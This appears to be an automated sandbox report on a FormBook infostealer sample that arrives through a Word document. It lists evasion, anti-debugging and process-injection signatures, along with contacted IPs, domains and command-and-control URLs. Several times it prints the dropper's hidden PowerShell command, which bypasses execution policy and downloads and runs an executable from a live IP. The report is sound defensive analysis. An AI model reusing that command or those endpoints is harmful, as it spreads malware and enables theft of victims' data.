Source: Yara match File source: 0000000A.00000002.2116660543.000000000238C000.00000004.00000001.sdmp, type: MEMORY
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\docsc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\docsc.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004088B0 rdtsc 12_2_004088B0
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3036 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2832 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2992 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1664 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe TID: 2948 Thread sleep time: -104068s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe TID: 2884 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe TID: 2236 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2796 Thread sleep time: -35000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2560 Thread sleep time: -44000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Thread delayed: delay time: 104068 Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D1660 CheckRemoteDebuggerPresent, 10_2_001D1660
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\docsc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004088B0 rdtsc 12_2_004088B0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00409B20 LdrLoadDll, 12_2_00409B20
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007426F8 mov eax, dword ptr fs:[00000030h] 12_2_007426F8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B26F8 mov eax, dword ptr fs:[00000030h] 14_2_020B26F8
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.foreverjsdesigns.com
Source: C:\Windows\explorer.exe Network Connect: 202.210.8.86 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 44.230.85.241 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.southernbrushworks.com
Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 209.143.158.10 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 75.2.115.196 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.boostcoachingonline.com
Source: C:\Windows\explorer.exe Domain query: www.applewholesales.com
Source: C:\Windows\explorer.exe Domain query: www.thepocket-onlinelesson.xyz
Source: C:\Windows\explorer.exe Domain query: www.ethereumdailypay.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.qqkit.net
Source: C:\Windows\explorer.exe Network Connect: 107.155.89.74 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.betsysellsswfl.com
Bypasses PowerShell execution policy
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\docsc.exe Memory written: C:\Users\user\AppData\Roaming\docsc.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\docsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\docsc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\docsc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\docsc.exe Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: AA0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe 'C:\Users\user\AppData\Roaming\docsc.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\docsc.exe' Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE Queries volume information: C:\Users\user\AppData\Local\Temp\OICE_A3A241B7-2F36-435D-B046-C9F74B3487D8.0\FLDA58.tmp VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Queries volume information: C:\Users\user\AppData\Roaming\docsc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 412069 Sample: 1c60a1e9_by_Libranalysis Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 56 www.4520oceanviewavenue.com 2->56 58 4520oceanviewavenue.com 2->58 68 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 18 other signatures 2->74 12 WINWORD.EXE 293 39 2->12         started        signatures3 process4 file5 46 C:\Users\user\AppData\Local\...\docsc[1].exe, PE32 12->46 dropped 48 C:\Users\user\AppData\Local\...\FLDA58.tmp, 370 12->48 dropped 50 C:\Users\user\AppData\...\Abctfhghgdghgh .ScT, data 12->50 dropped 52 C:\Users\user\AppData\Local\...\F3A4D79D.png, 370 12->52 dropped 94 Document exploit detected (creates forbidden files) 12->94 96 Suspicious powershell command line found 12->96 98 Tries to download and execute files (via powershell) 12->98 100 Microsoft Office creates scripting files 12->100 16 powershell.exe 12 7 12->16         started        21 powershell.exe 7 12->21         started        23 powershell.exe 7 12->23         started        25 FLTLDR.EXE 12->25         started        signatures6 process7 dnsIp8 54 157.55.173.72, 49165, 49166, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 16->54 44 C:\Users\user\AppData\Roaming\docsc.exe, PE32 16->44 dropped 66 Powershell drops PE file 16->66 27 docsc.exe 16->27         started        file9 signatures10 process11 signatures12 86 Detected unpacking (changes PE section rights) 27->86 88 Machine Learning detection for dropped file 27->88 90 Tries to detect virtualization through RDTSC time measurements 27->90 92 2 other signatures 27->92 30 docsc.exe 27->30         started        33 docsc.exe 27->33         started        process13 signatures14 102 Modifies the context of a thread in another process (thread injection) 30->102 104 Maps a DLL or memory area into another process 30->104 106 Sample uses process hollowing technique 30->106 108 Queues an APC in another process (thread injection) 30->108 35 explorer.exe 30->35 injected process15 dnsIp16 60 www.thepocket-onlinelesson.xyz 202.210.8.86, 49168, 80 VECTANTARTERIANetworksCorporationJP Japan 35->60 62 ethereumdailypay.com 209.143.158.10, 49172, 80 ILANDUS United States 35->62 64 13 other IPs or domains 35->64 76 System process connects to network (likely due to code injection or exploit) 35->76 78 Performs DNS queries to domains with low reputation 35->78 39 NAPSTAT.EXE 35->39         started        signatures17 process18 signatures19 80 Modifies the context of a thread in another process (thread injection) 39->80 82 Maps a DLL or memory area into another process 39->82 84 Tries to detect virtualization through RDTSC time measurements 39->84 42 cmd.exe 39->42         started        process20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
209.143.158.10
 ethereumdailypay.com United States
14127 ILANDUS true
75.2.115.196
 www.applewholesales.com United States
16509 AMAZON-02US true
202.210.8.86
 www.thepocket-onlinelesson.xyz Japan 2519 VECTANTARTERIANetworksCorporationJP true
44.230.85.241
 uixie.porkbun.com United States
16509 AMAZON-02US false
34.102.136.180
 southernbrushworks.com United States
15169 GOOGLEUS false
157.55.173.72
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS true
184.168.131.241
 4520oceanviewavenue.com United States
26496 AS-26496-GO-DADDY-COM-LLCUS true
107.155.89.74
 betsysellsswfl.com United States
29802 HVC-ASUS true

Private
IP
192.168.2.22
192.168.2.255

Contacted Domains

Name IP Active
4520oceanviewavenue.com 184.168.131.241 true
betsysellsswfl.com 107.155.89.74 true
ethereumdailypay.com 209.143.158.10 true
www.applewholesales.com 75.2.115.196 true
www.thepocket-onlinelesson.xyz 202.210.8.86 true
uixie.porkbun.com 44.230.85.241 true
boostcoachingonline.com 184.168.131.241 true
southernbrushworks.com 34.102.136.180 true
www.boostcoachingonline.com unknown unknown
www.foreverjsdesigns.com unknown unknown
www.southernbrushworks.com unknown unknown
www.ethereumdailypay.com unknown unknown
www.qqkit.net unknown unknown
www.4520oceanviewavenue.com unknown unknown
www.betsysellsswfl.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.foreverjsdesigns.com/a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV true
  • Avira URL Cloud: safe
 unknown
http://157.55.173.72/goose/docsc.exe true
  • Avira URL Cloud: safe
 unknown
www.rogegalmish.com/a8si/ true
  • Avira URL Cloud: safe
 low
http://www.ethereumdailypay.com/a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA== true
  • Avira URL Cloud: safe
 unknown
http://www.thepocket-onlinelesson.xyz/a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV true
  • Avira URL Cloud: safe
 unknown
http://www.boostcoachingonline.com/a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg== true
  • Avira URL Cloud: safe
 unknown
http://www.southernbrushworks.com/a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg== false
  • Avira URL Cloud: safe
 unknown
http://www.betsysellsswfl.com/a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV true
  • Avira URL Cloud: safe
 unknown
http://www.applewholesales.com/a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV true
  • Avira URL Cloud: safe
 unknown
http://www.4520oceanviewavenue.com/a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg== true
  • Avira URL Cloud: safe
 unknown